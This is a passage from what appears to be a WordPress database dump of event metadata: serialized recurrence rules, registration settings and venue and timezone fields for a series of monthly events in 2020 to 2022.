:\"timestamp\";i:1633257000;s:8:\"duration\";i:5400;}i:263376;a:2:{s:9:\"timestamp\";i:1636281000;s:8:\"duration\";i:5400;}i:263377;a:2:{s:9:\"timestamp\";i:1638700200;s:8:\"duration\";i:5400;}i:263378;a:2:{s:9:\"timestamp\";i:1641119400;s:8:\"duration\";i:5400;}i:263379;a:2:{s:9:\"timestamp\";i:1644143400;s:8:\"duration\";i:5400;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:11;}'),(128500,263369,'protect_children',''),(128501,263369,'protect_children',''),(128502,263369,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635270;s:12:\"_EventOrigin\";i:1610635270;s:13:\"_thumbnail_id\";i:1610635270;s:26:\"_RTECregistrationsDisabled\";i:1610635270;s:17:\"_RTECdeadlineType\";i:1610635270;s:19:\"_RTECwhoCanRegister\";i:1610635270;s:23:\"_RTEClimitRegistrations\";i:1610635270;s:21:\"_RTECmaxRegistrations\";i:1610635270;s:24:\"boldgrid_hide_page_title\";i:1610635270;s:16:\"_EventRecurrence\";i:1610635270;s:17:\"_EventShowMapLink\";i:1610635270;s:13:\"_EventShowMap\";i:1610635271;s:13:\"_EventVenueID\";i:1610635271;s:20:\"_EventCurrencySymbol\";i:1610635271;s:22:\"_EventCurrencyPosition\";i:1610635271;s:10:\"_EventCost\";i:1610635271;s:9:\"_EventURL\";i:1610635271;s:14:\"_EventTimezone\";i:1610635271;s:12:\"_dp_original\";i:1610635271;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635271;s:16:\"tribe_events_cat\";i:1610660471;}'),(128516,263369,'_EventVenueID','262305'),(128517,263369,'_EventCurrencySymbol',''),(128518,263369,'_EventCurrencyPosition','prefix'),(128519,263369,'_EventCost',''),(128520,263369,'_EventURL',''),(128521,263369,'_EventTimezone','America/Denver'),(128522,263369,'_dp_original','263362'),(128503,263369,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635270;s:12:\"_EventOrigin\";i:1610635270;s:13:\"_thumbnail_id\";i:1610635270;s:26:\"_RTECregistrationsDisabled\";i:1610635270;s:17:\"_RTECdeadlineType\";i:1610635270;s:19:\"_RTECwhoCanRegister\";i:1610635270;s:23:\"_RTEClimitRegistrations\";i:1610635270;s:21:\"_RTECmaxRegistrations\";i:1610635270;s:24:\"boldgrid_hide_page_title\";i:1610635270;s:16:\"_EventRecurrence\";i:1610635270;s:17:\"_EventShowMapLink\";i:1610635270;s:13:\"_EventShowMap\";i:1610635271;s:13:\"_EventVenueID\";i:1610635271;s:20:\"_EventCurrencySymbol\";i:1610635271;s:22:\"_EventCurrencyPosition\";i:1610635271;s:10:\"_EventCost\";i:1610635271;s:9:\"_EventURL\";i:1610635271;s:14:\"_EventTimezone\";i:1610635271;s:12:\"_dp_original\";i:1610635271;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635271;s:16:\"tribe_events_cat\";i:1610660471;}'),(128499,263369,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635270;s:12:\"_EventOrigin\";i:1610635270;s:13:\"_thumbnail_id\";i:1610635270;s:26:\"_RTECregistrationsDisabled\";i:1610635270;s:17:\"_RTECdeadlineType\";i:1610635270;s:19:\"_RTECwhoCanRegister\";i:1610635270;s:23:\"_RTEClimitRegistrations\";i:1610635270;s:21:\"_RTECmaxRegistrations\";i:1610635270;s:24:\"boldgrid_hide_page_title\";i:1610635270;s:16:\"_EventRecurrence\";i:1610635270;s:17:\"_EventShowMapLink\";i:1610635270;s:13:\"_EventShowMap\";i:1610635271;s:13:\"_EventVenueID\";i:1610635271;s:20:\"_EventCurrencySymbol\";i:1610635271;s:22:\"_EventCurrencyPosition\";i:1610635271;s:10:\"_EventCost\";i:1610635271;s:9:\"_EventURL\";i:1610635271;s:14:\"_EventTimezone\";i:1610635271;s:12:\"_dp_original\";i:1610635271;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635271;s:16:\"tribe_events_cat\";i:1610660471;}'),(128548,263370,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:11:{i:263369;a:2:{s:9:\"timestamp\";i:1617532200;s:8:\"duration\";i:5400;}i:263370;a:2:{s:9:\"timestamp\";i:1619951400;s:8:\"duration\";i:5400;}i:263371;a:2:{s:9:\"timestamp\";i:1622975400;s:8:\"duration\";i:5400;}i:263372;a:2:{s:9:\"timestamp\";i:1625394600;s:8:\"duration\";i:5400;}i:263373;a:2:{s:9:\"timestamp\";i:1627813800;s:8:\"duration\";i:5400;}i:263374;a:2:{s:9:\"timestamp\";i:1630837800;s:8:\"duration\";i:5400;}i:263375;a:2:{s:9:\"timestamp\";i:1633257000;s:8:\"duration\";i:5400;}i:263376;a:2:{s:9:\"timestamp\";i:1636281000;s:8:\"duration\";i:5400;}i:263377;a:2:{s:9:\"timestamp\";i:1638700200;s:8:\"duration\";i:5400;}i:263378;a:2:{s:9:\"timestamp\";i:1641119400;s:8:\"duration\";i:5400;}i:263379;a:2:{s:9:\"timestamp\";i:1644143400;s:8:\"duration\";i:5400;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:11;}'),(128547,263370,'_dp_original','263362'),(128546,263370,'_EventTimezone','America/Denver'),(128536,263370,'_RTECmaxRegistrations','30'),(128537,263370,'boldgrid_hide_page_title','0'),(128538,263370,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2022-02-06\";s:14:\"EventStartDate\";s:19:\"2021-03-07 10:30:00\";s:12:\"EventEndDate\";s:19:\"2021-03-07 12:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(128529,263370,'_EventOrigin','events-calendar'),(128539,263370,'_EventShowMapLink','1'),(128540,263370,'_EventShowMap','1'),(128541,263370,'_EventVenueID','262305'),(128542,263370,'_EventCurrencySymbol',''),(128543,263370,'_EventCurrencyPosition','prefix'),(128544,263370,'_EventCost',''),(128545,263370,'_EventURL',''),(128530,263370,'_EventOrigin','events-calendar'),(128532,263370,'_RTECregistrationsDisabled','1'),(128533,263370,'_RTECdeadlineType','start'),(128528,263370,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635271;s:12:\"_EventOrigin\";i:1610635271;s:13:\"_thumbnail_id\";i:1610635271;s:26:\"_RTECregistrationsDisabled\";i:1610635271;s:17:\"_RTECdeadlineType\";i:1610635271;s:19:\"_RTECwhoCanRegister\";i:1610635271;s:23:\"_RTEClimitRegistrations\";i:1610635271;s:21:\"_RTECmaxRegistrations\";i:1610635271;s:24:\"boldgrid_hide_page_title\";i:1610635271;s:16:\"_EventRecurrence\";i:1610635271;s:17:\"_EventShowMapLink\";i:1610635271;s:13:\"_EventShowMap\";i:1610635271;s:13:\"_EventVenueID\";i:1610635271;s:20:\"_EventCurrencySymbol\";i:1610635271;s:22:\"_EventCurrencyPosition\";i:1610635271;s:10:\"_EventCost\";i:1610635271;s:9:\"_EventURL\";i:1610635271;s:14:\"_EventTimezone\";i:1610635271;s:12:\"_dp_original\";i:1610635271;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635271;s:16:\"tribe_events_cat\";i:1610660471;}'),(128534,263370,'_RTECwhoCanRegister','any'),(128535,263370,'_RTEClimitRegistrations','0'),(128572,263371,'_dp_original','263362'),(128573,263371,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:11:{i:263369;a:2:{s:9:\"timestamp\";i:1617532200;s:8:\"duration\";i:5400;}i:263370;a:2:{s:9:\"timestamp\";i:1619951400;s:8:\"duration\";i:5400;}i:263371;a:2:{s:9:\"timestamp\";i:1622975400;s:8:\"duration\";i:5400;}i:263372;a:2:{s:9:\"timestamp\";i:1625394600;s:8:\"duration\";i:5400;}i:263373;a:2:{s:9:\"timestamp\";i:1627813800;s:8:\"duration\";i:5400;}i:263374;a:2:{s:9:\"timestamp\";i:1630837800;s:8:\"duration\";i:5400;}i:263375;a:2:{s:9:\"timestamp\";i:1633257000;s:8:\"duration\";i:5400;}i:263376;a:2:{s:9:\"timestamp\";i:1636281000;s:8:\"duration\";i:5400;}i:263377;a:2:{s:9:\"timestamp\";i:1638700200;s:8:\"duration\";i:5400;}i:263378;a:2:{s:9:\"timestamp\";i:1641119400;s:8:\"duration\";i:5400;}i:263379;a:2:{s:9:\"timestamp\";i:1644143400;s:8:\"duration\";i:5400;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:11;}'),(128561,263371,'_RTECmaxRegistrations','30'),(128562,263371,'boldgrid_hide_page_title','0'),(128563,263371,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2022-02-06\";s:14:\"EventStartDate\";s:19:\"2021-03-07 10:30:00\";s:12:\"EventEndDate\";s:19:\"2021-03-07 12:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(128554,263371,'_EventOrigin','events-calendar'),(128564,263371,'_EventShowMapLink','1'),(128565,263371,'_EventShowMap','1'),(128566,263371,'_EventVenueID','262305'),(128567,263371,'_EventCurrencySymbol',''),(128568,263371,'_EventCurrencyPosition','prefix'),(128569,263371,'_EventCost',''),(128570,263371,'_EventURL',''),(128571,263371,'_EventTimezone','America/Denver'),(128549,263371,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635271;s:12:\"_EventOrigin\";i:1610635271;s:13:\"_thumbnail_id\";i:1610635271;s:26:\"_RTECregistrationsDisabled\";i:1610635271;s:17:\"_RTECdeadlineType\";i:1610635271;s:19:\"_RTECwhoCanRegister\";i:1610635271;s:23:\"_RTEClimitRegistrations\";i:1610635271;s:21:\"_RTECmaxRegistrations\";i:1610635271;s:24:\"boldgrid_hide_page_title\";i:1610635271;s:16:\"_EventRecurrence\";i:1610635271;s:17:\"_EventShowMapLink\";i:1610635271;s:13:\"_EventShowMap\";i:1610635271;s:13:\"_EventVenueID\";i:1610635271;s:20:\"_EventCurrencySymbol\";i:1610635271;s:22:\"_EventCurrencyPosition\";i:1610635271;s:10:\"_EventCost\";i:1610635271;s:9:\"_EventURL\";i:1610635271;s:14:\"_EventTimezone\";i:1610635271;s:12:\"_dp_original\";i:1610635271;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635271;s:16:\"tribe_events_cat\";i:1610660471;}'),(128555,263371,'_EventOrigin','events-calendar'),(128557,263371,'_RTECregistrationsDisabled','1'),(128558,263371,'_RTECdeadlineType','start'),(128559,263371,'_RTECwhoCanRegister','any'),(128560,263371,'_RTEClimitRegistrations','0'),(128553,263371,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635271;s:12:\"_EventOrigin\";i:1610635271;s:13:\"_thumbnail_id\";i:1610635271;s:26:\"_RTECregistrationsDisabled\";i:1610635271;s:17:\"_RTECdeadlineType\";i:1610635271;s:19:\"_RTECwhoCanRegister\";i:1610635271;s:23:\"_RTEClimitRegistrations\";i:1610635271;s:21:\"_RTECmaxRegistrations\";i:1610635271;s:24:\"boldgrid_hide_page_title\";i:1610635271;s:16:\"_EventRecurrence\";i:1610635271;s:17:\"_EventShowMapLink\";i:1610635271;s:13:\"_EventShowMap\";i:1610635271;s:13:\"_EventVenueID\";i:1610635271;s:20:\"_EventCurrencySymbol\";i:1610635271;s:22:\"_EventCurrencyPosition\";i:1610635271;s:10:\"_EventCost\";i:1610635271;s:9:\"_EventURL\";i:1610635271;s:14:\"_EventTimezone\";i:1610635271;s:12:\"_dp_original\";i:1610635271;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635271;s:16:\"tribe_events_cat\";i:1610660471;}'),(128550,263371,'protect_children',''),(128551,263371,'protect_children',''),(128552,263371,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635271;s:12:\"_EventOrigin\";i:1610635271;s:13:\"_thumbnail_id\";i:1610635271;s:26:\"_RTECregistrationsDisabled\";i:1610635271;s:17:\"_RTECdeadlineType\";i:1610635271;s:19:\"_RTECwhoCanRegister\";i:1610635271;s:23:\"_RTEClimitRegistrations\";i:1610635271;s:21:\"_RTECmaxRegistrations\";i:1610635271;s:24:\"boldgrid_hide_page_title\";i:1610635271;s:16:\"_EventRecurrence\";i:1610635271;s:17:\"_EventShowMapLink\";i:1610635271;s:13:\"_EventShowMap\";i:1610635271;s:13:\"_EventVenueID\";i:1610635271;s:20:\"_EventCurrencySymbol\";i:1610635271;s:22:\"_EventCurrencyPosition\";i:1610635271;s:10:\"_EventCost\";i:1610635271;s:9:\"_EventURL\";i:1610635271;s:14:\"_EventTimezone\";i:1610635271;s:12:\"_dp_original\";i:1610635271;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635271;s:16:\"tribe_events_cat\";i:1610660471;}'),(128575,263372,'protect_children',''),(128576,263372,'protect_children',''),(128577,263372,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635271;s:12:\"_EventOrigin\";i:1610635271;s:13:\"_thumbnail_id\";i:1610635271;s:26:\"_RTECregistrationsDisabled\";i:1610635271;s:17:\"_RTECdeadlineType\";i:1610635271;s:19:\"_RTECwhoCanRegister\";i:1610635271;s:23:\"_RTEClimitRegistrations\";i:1610635271;s:21:\"_RTECmaxRegistrations\";i:1610635271;s:24:\"boldgrid_hide_page_title\";i:1610635271;s:16:\"_EventRecurrence\";i:1610635271;s:17:\"_EventShowMapLink\";i:1610635271;s:13:\"_EventShowMap\";i:1610635271;s:13:\"_EventVenueID\";i:1610635271;s:20:\"_EventCurrencySymbol\";i:1610635271;s:22:\"_EventCurrencyPosition\";i:1610635271;s:10:\"_EventCost\";i:1610635271;s:9:\"_EventURL\";i:1610635271;s:14:\"_EventTimezone\";i:1610635271;s:12:\"_dp_original\";i:1610635271;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635271;s:16:\"tribe_events_cat\";i:1610660471;}'),(128579,263372,'_EventOrigin','events-calendar'),(128580,263372,'_EventOrigin','events-calendar'),(128582,263372,'_RTECregistrationsDisabled','1'),(128583,263372,'_RTECdeadlineType','start'),(128584,263372,'_RTECwhoCanRegister','any'),(128585,263372,'_RTEClimitRegistrations','0'),(128586,263372,'_RTECmaxRegistrations','30'),(128587,263372,'boldgrid_hide_page_title','0'),(128588,263372,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2022-02-06\";s:14:\"EventStartDate\";s:19:\"2021-03-07 10:30:00\";s:12:\"EventEndDate\";s:19:\"2021-03-07 12:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(128589,263372,'_EventShowMapLink','1'),(128590,263372,'_EventShowMap','1'),(128591,263372,'_EventVenueID','262305'),(128592,263372,'_EventCurrencySymbol',''),(128593,263372,'_EventCurrencyPosition','prefix'),(128594,263372,'_EventCost',''),(128595,263372,'_EventURL',''),(128596,263372,'_EventTimezone','America/Denver'),(128597,263372,'_dp_original','263362'),(128598,263372,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:11:{i:263369;a:2:{s:9:\"timestamp\";i:1617532200;s:8:\"duration\";i:5400;}i:263370;a:2:{s:9:\"timestamp\";i:1619951400;s:8:\"duration\";i:5400;}i:263371;a:2:{s:9:\"timestamp\";i:1622975400;s:8:\"duration\";i:5400;}i:263372;a:2:{s:9:\"timestamp\";i:1625394600;s:8:\"duration\";i:5400;}i:263373;a:2:{s:9:\"timestamp\";i:1627813800;s:8:\"duration\";i:5400;}i:263374;a:2:{s:9:\"timestamp\";i:1630837800;s:8:\"duration\";i:5400;}i:263375;a:2:{s:9:\"timestamp\";i:1633257000;s:8:\"duration\";i:5400;}i:263376;a:2:{s:9:\"timestamp\";i:1636281000;s:8:\"duration\";i:5400;}i:263377;a:2:{s:9:\"timestamp\";i:1638700200;s:8:\"duration\";i:5400;}i:263378;a:2:{s:9:\"timestamp\";i:1641119400;s:8:\"duration\";i:5400;}i:263379;a:2:{s:9:\"timestamp\";i:1644143400;s:8:\"duration\";i:5400;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:11;}'),(128604,263373,'_EventOrigin','events-calendar'),(128614,263373,'_EventShowMapLink','1'),(128615,263373,'_EventShowMap','1'),(128616,263373,'_EventVenueID','262305'),(128617,263373,'_EventCurrencySymbol',''),(128618,263373,'_EventCurrencyPosition','prefix'),(128619,263373,'_EventCost',''),(128620,263373,'_EventURL',''),(128621,263373,'_EventTimezone','America/Denver'),(128622,263373,'_dp_original','263362'),(128623,263373,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:11:{i:263369;a:2:{s:9:\"timestamp\";i:1617532200;s:8:\"duration\";i:5400;}i:263370;a:2:{s:9:\"timestamp\";i:1619951400;s:8:\"duration\";i:5400;}i:263371;a:2:{s:9:\"timestamp\";i:1622975400;s:8:\"duration\";i:5400;}i:263372;a:2:{s:9:\"timestamp\";i:1625394600;s:8:\"duration\";i:5400;}i:263373;a:2:{s:9:\"timestamp\";i:1627813800;s:8:\"duration\";i:5400;}i:263374;a:2:{s:9:\"timestamp\";i:1630837800;s:8:\"duration\";i:5400;}i:263375;a:2:{s:9:\"timestamp\";i:1633257000;s:8:\"duration\";i:5400;}i:263376;a:2:{s:9:\"timestamp\";i:1636281000;s:8:\"duration\";i:5400;}i:263377;a:2:{s:9:\"timestamp\";i:1638700200;s:8:\"duration\";i:5400;}i:263378;a:2:{s:9:\"timestamp\";i:1641119400;s:8:\"duration\";i:5400;}i:263379;a:2:{s:9:\"timestamp\";i:1644143400;s:8:\"duration\";i:5400;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:11;}'),(128611,263373,'_RTECmaxRegistrations','30'),(128612,263373,'boldgrid_hide_page_title','0'),(128613,263373,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2022-02-06\";s:14:\"EventStartDate\";s:19:\"2021-03-07 10:30:00\";s:12:\"EventEndDate\";s:19:\"2021-03-07 12:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(128599,263373,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635271;s:12:\"_EventOrigin\";i:1610635271;s:13:\"_thumbnail_id\";i:1610635271;s:26:\"_RTECregistrationsDisabled\";i:1610635271;s:17:\"_RTECdeadlineType\";i:1610635271;s:19:\"_RTECwhoCanRegister\";i:1610635271;s:23:\"_RTEClimitRegistrations\";i:1610635271;s:21:\"_RTECmaxRegistrations\";i:1610635271;s:24:\"boldgrid_hide_page_title\";i:1610635271;s:16:\"_EventRecurrence\";i:1610635271;s:17:\"_EventShowMapLink\";i:1610635271;s:13:\"_EventShowMap\";i:1610635271;s:13:\"_EventVenueID\";i:1610635271;s:20:\"_EventCurrencySymbol\";i:1610635271;s:22:\"_EventCurrencyPosition\";i:1610635271;s:10:\"_EventCost\";i:1610635271;s:9:\"_EventURL\";i:1610635271;s:14:\"_EventTimezone\";i:1610635271;s:12:\"_dp_original\";i:1610635271;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635271;s:16:\"tribe_events_cat\";i:1610660471;}'),(128605,263373,'_EventOrigin','events-calendar'),(128607,263373,'_RTECregistrationsDisabled','1'),(128608,263373,'_RTECdeadlineType','start'),(128609,263373,'_RTECwhoCanRegister','any'),(128603,263373,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635271;s:12:\"_EventOrigin\";i:1610635271;s:13:\"_thumbnail_id\";i:1610635271;s:26:\"_RTECregistrationsDisabled\";i:1610635271;s:17:\"_RTECdeadlineType\";i:1610635271;s:19:\"_RTECwhoCanRegister\";i:1610635271;s:23:\"_RTEClimitRegistrations\";i:1610635271;s:21:\"_RTECmaxRegistrations\";i:1610635271;s:24:\"boldgrid_hide_page_title\";i:1610635271;s:16:\"_EventRecurrence\";i:1610635271;s:17:\"_EventShowMapLink\";i:1610635271;s:13:\"_EventShowMap\";i:1610635271;s:13:\"_EventVenueID\";i:1610635271;s:20:\"_EventCurrencySymbol\";i:1610635271;s:22:\"_EventCurrencyPosition\";i:1610635271;s:10:\"_EventCost\";i:1610635271;s:9:\"_EventURL\";i:1610635271;s:14:\"_EventTimezone\";i:1610635271;s:12:\"_dp_original\";i:1610635271;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635271;s:16:\"tribe_events_cat\";i:1610660471;}'),(128600,263373,'protect_children',''),(128601,263373,'protect_children',''),(128602,263373,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635271;s:12:\"_EventOrigin\";i:1610635271;s:13:\"_thumbnail_id\";i:1610635271;s:26:\"_RTECregistrationsDisabled\";i:1610635271;s:17:\"_RTECdeadlineType\";i:1610635271;s:19:\"_RTECwhoCanRegister\";i:1610635271;s:23:\"_RTEClimitRegistrations\";i:1610635271;s:21:\"_RTECmaxRegistrations\";i:1610635271;s:24:\"boldgrid_hide_page_title\";i:1610635271;s:16:\"_EventRecurrence\";i:1610635271;s:17:\"_EventShowMapLink\";i:1610635271;s:13:\"_EventShowMap\";i:1610635271;s:13:\"_EventVenueID\";i:1610635271;s:20:\"_EventCurrencySymbol\";i:1610635271;s:22:\"_EventCurrencyPosition\";i:1610635271;s:10:\"_EventCost\";i:1610635271;s:9:\"_EventURL\";i:1610635271;s:14:\"_EventTimezone\";i:1610635271;s:12:\"_dp_original\";i:1610635271;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635271;s:16:\"tribe_events_cat\";i:1610660471;}'),(128610,263373,'_RTEClimitRegistrations','0'),(128625,263374,'protect_children',''),(128626,263374,'protect_children',''),(128627,263374,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635271;s:12:\"_EventOrigin\";i:1610635271;s:13:\"_thumbnail_id\";i:1610635271;s:26:\"_RTECregistrationsDisabled\";i:1610635271;s:17:\"_RTECdeadlineType\";i:1610635271;s:19:\"_RTECwhoCanRegister\";i:1610635271;s:23:\"_RTEClimitRegistrations\";i:1610635271;s:21:\"_RTECmaxRegistrations\";i:1610635271;s:24:\"boldgrid_hide_page_title\";i:1610635271;s:16:\"_EventRecurrence\";i:1610635271;s:17:\"_EventShowMapLink\";i:1610635271;s:13:\"_EventShowMap\";i:1610635271;s:13:\"_EventVenueID\";i:1610635271;s:20:\"_EventCurrencySymbol\";i:1610635271;s:22:\"_EventCurrencyPosition\";i:1610635271;s:10:\"_EventCost\";i:1610635271;s:9:\"_EventURL\";i:1610635271;s:14:\"_EventTimezone\";i:1610635271;s:12:\"_dp_original\";i:1610635271;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635271;s:16:\"tribe_events_cat\";i:1610660471;}'),(128650,263375,'protect_children',''),(128651,263375,'protect_children',''),(128652,263375,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635271;s:12:\"_EventOrigin\";i:1610635271;s:13:\"_thumbnail_id\";i:1610635271;s:26:\"_RTECregistrationsDisabled\";i:1610635271;s:17:\"_RTECdeadlineType\";i:1610635271;s:19:\"_RTECwhoCanRegister\";i:1610635271;s:23:\"_RTEClimitRegistrations\";i:1610635271;s:21:\"_RTECmaxRegistrations\";i:1610635271;s:24:\"boldgrid_hide_page_title\";i:1610635271;s:16:\"_EventRecurrence\";i:1610635271;s:17:\"_EventShowMapLink\";i:1610635271;s:13:\"_EventShowMap\";i:1610635271;s:13:\"_EventVenueID\";i:1610635271;s:20:\"_EventCurrencySymbol\";i:1610635271;s:22:\"_EventCurrencyPosition\";i:1610635271;s:10:\"_EventCost\";i:1610635271;s:9:\"_EventURL\";i:1610635271;s:14:\"_EventTimezone\";i:1610635271;s:12:\"_dp_original\";i:1610635271;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635271;s:16:\"tribe_events_cat\";i:1610660471;}'),(128675,263376,'protect_children',''),(128676,263376,'protect_children',''),(128677,263376,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635271;s:12:\"_EventOrigin\";i:1610635271;s:13:\"_thumbnail_id\";i:1610635271;s:26:\"_RTECregistrationsDisabled\";i:1610635271;s:17:\"_RTECdeadlineType\";i:1610635271;s:19:\"_RTECwhoCanRegister\";i:1610635271;s:23:\"_RTEClimitRegistrations\";i:1610635271;s:21:\"_RTECmaxRegistrations\";i:1610635271;s:24:\"boldgrid_hide_page_title\";i:1610635271;s:16:\"_EventRecurrence\";i:1610635271;s:17:\"_EventShowMapLink\";i:1610635271;s:13:\"_EventShowMap\";i:1610635271;s:13:\"_EventVenueID\";i:1610635271;s:20:\"_EventCurrencySymbol\";i:1610635271;s:22:\"_EventCurrencyPosition\";i:1610635271;s:10:\"_EventCost\";i:1610635271;s:9:\"_EventURL\";i:1610635271;s:14:\"_EventTimezone\";i:1610635271;s:12:\"_dp_original\";i:1610635271;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635271;s:16:\"tribe_events_cat\";i:1610660471;}'),(128700,263377,'protect_children',''),(128701,263377,'protect_children',''),(128702,263377,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635272;s:12:\"_EventOrigin\";i:1610635272;s:13:\"_thumbnail_id\";i:1610635272;s:26:\"_RTECregistrationsDisabled\";i:1610635272;s:17:\"_RTECdeadlineType\";i:1610635272;s:19:\"_RTECwhoCanRegister\";i:1610635272;s:23:\"_RTEClimitRegistrations\";i:1610635272;s:21:\"_RTECmaxRegistrations\";i:1610635272;s:24:\"boldgrid_hide_page_title\";i:1610635272;s:16:\"_EventRecurrence\";i:1610635272;s:17:\"_EventShowMapLink\";i:1610635272;s:13:\"_EventShowMap\";i:1610635272;s:13:\"_EventVenueID\";i:1610635272;s:20:\"_EventCurrencySymbol\";i:1610635272;s:22:\"_EventCurrencyPosition\";i:1610635272;s:10:\"_EventCost\";i:1610635272;s:9:\"_EventURL\";i:1610635272;s:14:\"_EventTimezone\";i:1610635272;s:12:\"_dp_original\";i:1610635272;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635272;s:16:\"tribe_events_cat\";i:1610660472;}'),(128725,263378,'protect_children',''),(128726,263378,'protect_children',''),(127401,263404,'_RTECdeadlineType','start'),(127402,263404,'_RTECwhoCanRegister','any'),(127398,263404,'_EventOrigin','events-calendar'),(127406,263404,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:4:\"Last\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-31\";s:14:\"EventStartDate\";s:19:\"2020-11-29 10:00:00\";s:12:\"EventEndDate\";s:19:\"2020-11-29 12:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(127407,263404,'_EventShowMapLink','1'),(127408,263404,'_EventShowMap','1'),(127409,263404,'_EventVenueID','262305'),(127410,263404,'_EventStartDate','2020-11-29 10:00:00'),(127411,263404,'_EventEndDate','2020-11-29 12:00:00'),(127412,263404,'_EventStartDateUTC','2020-11-29 17:00:00'),(127413,263404,'_EventEndDateUTC','2020-11-29 